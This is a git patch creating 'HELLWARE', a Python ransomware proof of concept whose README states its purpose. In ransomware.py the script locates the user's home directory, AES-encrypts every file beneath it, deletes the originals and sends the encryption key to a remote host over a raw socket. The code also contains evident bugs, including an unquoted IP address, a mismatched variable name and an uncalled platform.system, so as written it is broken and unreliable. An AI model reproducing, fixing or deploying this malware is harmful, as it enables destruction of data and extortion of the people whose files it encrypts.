From 5c2a4c5ab09c0782ae69a1fea97004114d438ceb Mon Sep 17 00:00:00 2001 From: hellisabove Date: Fri, 23 Aug 2024 13:00:55 +0300 Subject: [PATCH] Initial Commit --- README | 5 +++++ decrypt.py | 0 ransomware.py | 58 +++++++++++++++++++++++++++++++++++++++++++++++++++ server.py | 0 4 files changed, 63 insertions(+) create mode 100644 README create mode 100644 decrypt.py create mode 100644 ransomware.py create mode 100644 server.py diff --git a/README b/README new file mode 100644 index 0000000..8383a8b --- /dev/null +++ b/README @@ -0,0 +1,5 @@ +# HELLWARE + +This is a simple ransomware POC made in python +It is able to detect what os it is running on and encrypt accordingly +It can send the key used for encryption and decryption to a remote server diff --git a/decrypt.py b/decrypt.py new file mode 100644 index 0000000..e69de29 diff --git a/ransomware.py b/ransomware.py new file mode 100644 index 0000000..10b23df --- /dev/null +++ b/ransomware.py @@ -0,0 +1,58 @@ +import os +import socket +import getpass +import platform +from Crypto.Cipher import AES +from Crypto.Random import get_random_bytes +from Crypto.Util.Padding import pad + +# We create a socket to send the encryption key to a remote server +def send_key(key): + host = 192.168.0.155 + port = 9090 + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.sendall(key) + print("Key sent") + s.close() + +# Function to encrypt a file and removing the unencrypted one +def encrypt_file(file, key, iv): + cipher = AES.new(key, AES.MODE_CBC, iv) + + with open(file, 'rb') as file: + plaintext = file.read() + + ciphertext = cipher.encrypt(pad(plaintext, AES.block_size)) + + with open(file + 'hell', 'wb') as enc_file: + enc_file.write(iv + ciphertext) + + os.remove(file) + +# This will go through the specified folder and encrypt all of the files, even from subfolders +def encrypt_whole(path): + key = get_random_bytes(32) + iv = get_random_bytes(16) + send_key(key) + + for root, _, files in os.walk(folder_path): + for file_name in files: + file_path = os.path.join(root, file_name) + encrypt_file(file_path, key, iv) + print(f"Encrypted: {file_path}") + +# Main function +# Detects username, assembles path and calls function from above to encrypt +if __name__ == "__main__": + username = getpass.getuser() + path = '' + + if platform.system == "Windows": + path = r'C:\Users\%s' % username + elif platform.system == "Linux": + path = '/home/' + username + elif platform.system == "Darwin": + path = '/Users/' + username + + encrypt_whole(path) diff --git a/server.py b/server.py new file mode 100644 index 0000000..e69de29